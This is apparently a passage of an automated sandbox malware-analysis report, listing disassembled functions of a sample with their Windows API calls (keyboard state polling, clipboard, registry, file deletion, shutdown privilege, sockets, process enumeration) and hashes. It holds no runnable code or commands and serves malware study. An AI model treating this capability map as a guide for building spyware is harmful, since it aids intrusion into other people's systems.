                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 9c98b356cc66e55d3cfb2aaf3c62f207e45754947715167a700ee3783aa46595
                                                    • Instruction ID: b8b954285e08be581cd98d2de8adf1f215c7b588b2aeb2ca37d4ddfd9f7e1b81
                                                    • Instruction Fuzzy Hash: E6614971900219AFDF109FA4DC84AEEBBBAFF04701F148269F815A7291DB319A09CB60
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oaa$PJj$UCP)$UTF)$UTF16)
                                                    • API String ID: 0-3778967012
                                                    • Opcode ID: 4a299687a83bf36d439221ae994ed3428d2ad221a025e960c061e345e9ea5c7a
                                                    • Instruction ID: e30a69a2b9a430af777a71232eafd683407c02490103615bda78f90c0052ae91
                                                    • Instruction Fuzzy Hash: B6728275E002199BDB24DF58D8807EEB7B6FF49310F18816AE859EB390DB709D85CB90
                                                    APIs
                                                      • Part of subcall function 006810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00680038,?,?), ref: 006810BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680737
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006807D6
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0068086E
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00680AAD
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00680ABA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: d4b91821a4c68852134675429aa6dfe3e0c124cdad5553208729417bef049fcb
                                                    • Instruction ID: 2dca062366897e8a56710b8ec03bc47bd44fb1443ff71084410466c1340ef156
                                                    • Instruction Fuzzy Hash: CAE14F31204210AFDB54EF28C891D6BBBE6EF89714F04896DF459DB2A2DB30E905CB51
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00660241
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 006602C2
                                                    • GetKeyState.USER32(000000A0), ref: 006602DD
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 006602F7
                                                    • GetKeyState.USER32(000000A1), ref: 0066030C
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00660324
                                                    • GetKeyState.USER32(00000011), ref: 00660336
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0066034E
                                                    • GetKeyState.USER32(00000012), ref: 00660360
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00660378
                                                    • GetKeyState.USER32(0000005B), ref: 0066038A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 3cafc7b34b417a85d2d749927eefe9a0d333aedf07ba9dc33ef12b6d93f24ec3
                                                    • Instruction ID: 267db360d3fdeee6f2288a64cffdc2fe19339e041fe3725395296fc427fdfcb8
                                                    • Instruction Fuzzy Hash: 8841D4305047CA6BFF718B6088183E7BAA6AF12341F0840BDD5C6567C2EBD45AC887A2
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: db350c73cc3ab667eb0ca3cce25f1dc3c60f47a3be2b67fe3a1a071c3d539501
                                                    • Instruction ID: c3c159d36f9728cd130923d412a10ac47c81c2eef2f93b0d885e7fedae6a6a83
                                                    • Instruction Fuzzy Hash: CF218135340210AFDB10AF64EC49B6E77ABEF04715F10C12AF94ADB2A2DB75AD01CB58
                                                    APIs
                                                      • Part of subcall function 006048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006048A1,?,?,006037C0,?), ref: 006048CE
                                                      • Part of subcall function 00664CD3: GetFileAttributesW.KERNEL32(?,00663947), ref: 00664CD4
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00663ADF
                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00663B87
                                                    • MoveFileW.KERNEL32(?,?), ref: 00663B9A
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00663BB7
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00663BD9
                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00663BF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 4002782344-1173974218
                                                    • Opcode ID: a6020965b16eacb95517feeb7666d89cff1ddab58acdfc125e95381afd5d66ac
                                                    • Instruction ID: 62859ffa1f990c04596765595fecc94bd809ca01ff9731b1e64b906233484490
                                                    • Instruction Fuzzy Hash: 5651833184125D9ACF59EBA0CD929EEB77AAF14300F64416DE442772D1DF316F09CBA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ERCP$Oaa$VUUU$VUUU$VUUU$VUUU
                                                    • API String ID: 0-3338701262
                                                    • Opcode ID: ea433db9d7360129566a8b3476fc19441a713d7835a862cf9a57cb519701620e
                                                    • Instruction ID: 059e4a118d96145ea6342bcc55c966bf97e8008777c9df9b31219ed73503601c
                                                    • Instruction Fuzzy Hash: D0A25D74E0421A8BDF24CF58C9907EDB7B2BF55314F1885AAD85AA7380DB309EC5DB90
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0066F6AB
                                                    • Sleep.KERNEL32(0000000A), ref: 0066F6DB
                                                    • _wcscmp.LIBCMT ref: 0066F6EF
                                                    • _wcscmp.LIBCMT ref: 0066F70A
                                                    • FindNextFileW.KERNEL32(?,?), ref: 0066F7A8
                                                    • FindClose.KERNEL32(00000000), ref: 0066F7BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                    • String ID: *.*
                                                    • API String ID: 713712311-438819550
                                                    • Opcode ID: ca99d784d26562f339a04166c557137204345b0494b7beacba6aa01c32e758e4
                                                    • Instruction ID: bfc726ea3d7ef1041e43b4e34c7bc0b66ce6335ebca9588f3f86837006f1e02c
                                                    • Instruction Fuzzy Hash: DD41A27190021AAFCF54DF64EC85AEEBBB6FF05310F14456AE815A32A0DB309E84CF94
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 3e87661a3f3a3edfdb3f39419f8d25f0183c957a0f2099b86a8ba2030129b9de
                                                    • Instruction ID: 3368f8b6c3819f7f60236c28a45b31decf9efa430d791602b2a49ba2e9197ac1
                                                    • Instruction Fuzzy Hash: B412A970A00A09EFDF14CFA4D981AEEF3B6FF48300F144669E806A7291EB35AD55CB54
                                                    APIs
                                                      • Part of subcall function 00620FF6: std::exception::exception.LIBCMT ref: 0062102C
                                                      • Part of subcall function 00620FF6: __CxxThrowException@8.LIBCMT ref: 00621041
                                                    • _memmove.LIBCMT ref: 0065062F
                                                    • _memmove.LIBCMT ref: 00650744
                                                    • _memmove.LIBCMT ref: 006507EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                    • String ID: yZa
                                                    • API String ID: 1300846289-3732958941
                                                    • Opcode ID: 0e9de4375763adb255532050f66dcff30c0e1113adf98db3a44276eff3cacd51
                                                    • Instruction ID: f06b0cdb418e6f7a80aa537705f1e75ec65ba55f26be9122bcce45f95926242a
                                                    • Instruction Fuzzy Hash: 8B02AFB0E00219DFDF44DF64D981AAEBBB6EF84300F1480A9E806DB395EB31D955CB95
                                                    APIs
                                                      • Part of subcall function 00658CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00658D0D
                                                      • Part of subcall function 00658CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658D3A
                                                      • Part of subcall function 00658CC3: GetLastError.KERNEL32 ref: 00658D47
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 0066549B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 2e6cbe75fd418e7980a404da46b6df617f071c590a7f5717a47006ba911a184c
                                                    • Instruction ID: cd5478c4fea4e9e857deebb0ad16d841749c2d28d9f3ac9c95942f13348ea05c
                                                    • Instruction Fuzzy Hash: 5E012431654A112FE7286374EC4BBFA72DAEB04343F2402B4FC07E21C2DE510C848294
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf
                                                    • String ID: Oaa
                                                    • API String ID: 674341424-3268679879
                                                    • Opcode ID: ac937fe0b4d50b4c014805e91d1ac5f72fd4fcdcc3db74eae76093899b09d52b
                                                    • Instruction ID: 60a6672a8c38376d4ccf429bd013b8a0d252c18dd5f7ddded8870d38242be80e
                                                    • Instruction Fuzzy Hash: 3B229A716083119FC764DF24C881BABB7E7AF84700F18491DF89A97392DB70EA45CB96
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006765EF
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006765FE
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 0067661A
                                                    • listen.WSOCK32(00000000,00000005), ref: 00676629
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00676643
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00676657
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 4579469bf6a01cd7d9723258c0877ad82e1cbda44723862954bbbeed99cf8b2c
                                                    • Instruction ID: 27e60a3ff19f0964c766028a3d8aff95b8f709a12f2c4fe78feea27d9df2536c
                                                    • Opcode Fuzzy Hash: 4579469bf6a01cd7d9723258c0877ad82e1cbda44723862954bbbeed99cf8b2c
                                                    • Instruction Fuzzy Hash: F6219E70600600AFDB14AF64D849A6EB7BBEF44320F148259F95AE73D2CB70AD01CB65
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 006019FA
                                                    • GetSysColor.USER32(0000000F), ref: 00601A4E
                                                    • SetBkColor.GDI32(?,00000000), ref: 00601A61
                                                      • Part of subcall function 00601290: DefDlgProcW.USER32(?,00000020,?), ref: 006012D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ColorProc$LongWindow
                                                    • String ID:
                                                    • API String ID: 3744519093-0
                                                    • Opcode ID: 2530d30ddc796a9818d49d8c3a6869a6457ff0b1714cce759b5fa30ed0017822
                                                    • Instruction ID: 98dc97f4cfafa35a624c848a54bd82df0e2bd1f504176596b4c11451b69a6f8b
                                                    • Opcode Fuzzy Hash: 2530d30ddc796a9818d49d8c3a6869a6457ff0b1714cce759b5fa30ed0017822
                                                    • Instruction Fuzzy Hash: E5A13570286544BAD73DABA88C58EFB359FDB43351F14121EF502DE2D2CE258D0293B9
                                                    APIs
                                                      • Part of subcall function 006780A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006780CB
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00676AB1
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00676ADA
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00676B13
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00676B20
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00676B34
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 99427753-0
                                                    • Opcode ID: 297c3757312482906f7e28be90e1e0e6e917a2649a1158335ce524759ef24ede
                                                    • Instruction ID: cccab43ffd797f7e2da3e6130edec98cc720364ffc87ee3638299e35a5ec89c0
                                                    • Opcode Fuzzy Hash: 297c3757312482906f7e28be90e1e0e6e917a2649a1158335ce524759ef24ede
                                                    • Instruction Fuzzy Hash: E941B175740610AFEB54AB68DC86F6F77ABDB44710F04815CF94AAB3C3CA709D0087A5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 018ad0ab55a33479dbaca0f51374dc8b10761b41e7fad5759657c9a2d0e9aded
                                                    • Instruction ID: 0572cd3b75a535f6bb1faa0113d7e869cdd26cfcbfd25e7be25981b5461a54ee
                                                    • Opcode Fuzzy Hash: 018ad0ab55a33479dbaca0f51374dc8b10761b41e7fad5759657c9a2d0e9aded
                                                    • Instruction Fuzzy Hash: 7811B231740A116FE7212F26DC44A6B7B9BEF54721B804239F807D7261EB7099828BA9
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0066C69D
                                                    • CoCreateInstance.OLE32(00692D6C,00000000,00000001,00692BDC,?), ref: 0066C6B5
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                    • CoUninitialize.OLE32 ref: 0066C922
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                    • String ID: .lnk
                                                    • API String ID: 2683427295-24824748
                                                    • Opcode ID: 293674c381759d8e6cdd038d2b4e4a3292fa744fc943ec0f67f6cd05eacc6e05
                                                    • Instruction ID: 3a293dc6cd2a1ef5e011e4e15cfa22a9e60d37ee0fe517ab4562fc1eae5d886c
                                                    • Opcode Fuzzy Hash: 293674c381759d8e6cdd038d2b4e4a3292fa744fc943ec0f67f6cd05eacc6e05
                                                    • Instruction Fuzzy Hash: BCA13A71244205AFD744EF54C891EABB7EAEF98304F00491CF196971E2EB70AA49CB66
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00641D88,?), ref: 0067C312
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0067C324
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                    • API String ID: 2574300362-1816364905
                                                    • Opcode ID: 5d2dab3486891e891a9edbc7a5126ba9d7063f90d27891b15272ac50f884b1e0
                                                    • Instruction ID: 57ab83ddc36f08577f985f2ddcc3c3303f0566e3c64251a072f3500f27f35c55
                                                    • Opcode Fuzzy Hash: 5d2dab3486891e891a9edbc7a5126ba9d7063f90d27891b15272ac50f884b1e0
                                                    • Instruction Fuzzy Hash: 29E0EC75600713DFDB209F25D818A9676E6EB08775B80D53DE899D2250E770D881CBA0
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0067F151
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0067F15F
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0067F21F
                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0067F22E
                                                    Memory Dump Source
